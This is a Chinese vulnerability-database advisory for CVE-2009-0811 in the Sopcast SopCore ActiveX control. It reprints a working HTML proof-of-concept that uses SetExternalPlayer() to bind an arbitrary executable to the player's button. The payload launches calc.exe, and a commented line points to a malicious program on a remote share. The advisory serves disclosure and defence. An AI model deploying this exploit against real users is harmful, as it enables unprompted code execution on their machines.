Sopcast SopCore控件SetExternalPlayer()方式任意代码执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117443 漏洞类型 代码注入
发布时间 2009-03-03 更新时间 2009-03-05
CVE编号 CVE-2009-0811 CNNVD-ID CNNVD-200903-077
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8143
https://cxsecurity.com/issue/WLB-2009030138
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-077
|漏洞详情
SopCore是一个视频播放插件,安装后可以观看TvBaby的网络电视。SopCore控件的SetExternalPlayer()函数没有正确地验证ExternalPlayer属性参数,如果用户受骗访问了恶意网页,就可能将任意可执行文件关联到"外部播放器"按键上。之后当用户点击该按键时,就会未经提示便执行该文件。
|漏洞EXP
<!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
     user assisted remote code execution poc
     by Nine:Situations:Group::surfista (IE7/8)

our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/

Through the SetExternalPlayer() method and the ExternalPlayer property
is possible to associate an arbitrary executable to the "external player"
button (for clearness see http://www.sopcast.com/docs/ where the player
control buttons are showed) which opens Windows Media Player by default.
When the user click this button, the executable is launched without prompts
Also this value is stored in config.xml, inside the sopcast local folder
for further use, ex. with the sopcast client application
Note: this control is safe for scripting and safe for initialization
-->
<HTML>
<HEAD>
<script language="Javascript" type="text/JavaScript">
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
</script>
</HEAD>
<BODY>
<OBJECT
        ID="SopPlayer"
        name="SopPlayer"
        CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
        HEIGHT=375
        WIDTH=375>
</OBJECT>
</BODY>
</HTML>

# milw0rm.com [2009-03-03]
|参考资料

来源:XF
名称:sopcast-setexternalplayer-code-execution(48955)
链接:http://xforce.iss.net/xforce/xfdb/48955
来源:BID
名称:33920
链接:http://www.securityfocus.com/bid/33920
来源:BUGTRAQ
名称:20090226SopcastSopCoreControl(sopocx.ocx3.0.3.501)SetExternalPlayer()userassistedremotecodeexecutionpoc
链接:http://www.securityfocus.com/archive/1/archive/1/501252/100/0/threaded
来源:MISC
链接:http://retrogod.altervista.org/9sg_sopcastia.html